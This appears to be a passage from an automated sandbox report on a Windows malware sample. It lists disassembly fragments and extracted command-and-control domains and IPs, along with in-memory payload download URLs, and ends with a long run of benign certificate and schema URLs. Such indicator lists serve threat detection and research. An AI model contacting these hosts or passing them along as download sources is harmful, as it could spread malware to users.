                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FFD116
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 9_2_00FFAAC0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then lea esi, dword ptr [eax+00000270h] | 9_2_00FD8A50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 9_2_01006210
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FF83D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 9_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 9_2_00FD73D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h | 9_2_0100CA40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh] | 9_2_00FEEB80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah] | 9_2_00FDAB40
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edx, ecx | 9_2_00FE8B1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FEC300
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FE4CA0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then dec edx | 9_2_0100FD70
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov word ptr [eax], cx | 9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov word ptr [edx], di | 9_2_00FE747D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh] | 9_2_00FFC465
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFC465
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h] | 9_2_0100EDC1
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh | 9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh] | 9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h | 9_2_0100CDF0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFDDFF
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edi, ecx | 9_2_00FFA5B6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h] | 9_2_00FEB57D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edx, ecx | 9_2_00FF6D2E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FF8528
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edx, ecx | 9_2_00FF9E80
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFDE07
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then dec edx | 9_2_0100FE00
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then jmp edx | 9_2_00FF37D6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov dword ptr [esp+20h], eax | 9_2_00FD9780
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov word ptr [eax], cx | 9_2_00FE6F52
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 9_2_00FF7740
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then jmp eax | 9_2_00FF9739
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edi, dword ptr [esp+28h] | 9_2_00FF5F1B
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FFBF13
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] | 9_2_010106F0
                    Source: firefox.exe | Memory has grown: Private usage: 1MB later: 202MB

                    Networking

                    Source: Malware configuration extractor | URLs: pancakedipyps.click
                    Source: Malware configuration extractor | URLs: tentabatte.lat
                    Source: Malware configuration extractor | URLs: talkynicer.lat
                    Source: Malware configuration extractor | URLs: slipperyloo.lat
                    Source: Malware configuration extractor | URLs: bashfulacid.lat
                    Source: Malware configuration extractor | URLs: manyrestro.lat
                    Source: Malware configuration extractor | URLs: shapestickyr.lat
                    Source: Malware configuration extractor | URLs: wordyfindy.lat
                    Source: Malware configuration extractor | URLs: curverpluch.lat
                    Source: Malware configuration extractor | IPs: 185.215.113.43
                    Source: Malware configuration extractor | URLs: 147.45.44.224:1912
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B0E0C0 recv,recv,recv,recv, | 0_2_00B0E0C0
                    Source: 7620ab885d.exe, 7620ab885d.exe, 00000009.00000003.2367952280.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/random.exe
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/random.exeed.exeg
                    Source: skotes.exe, 00000005.00000003.2945149103.0000000000929000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/random.exehp
                    Source: skotes.exe, 00000005.00000003.2948994476.000000000091E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exe
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: b285303eae.exe, 0000001B.00000003.2788880393.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: 7ddd2a748c.exe, 00000013.00000003.2407620521.0000000001432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                    Source: 7620ab885d.exe, 00000009.00000002.2490488887.0000000005E89000.00000002.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366828204.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.0000000005785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
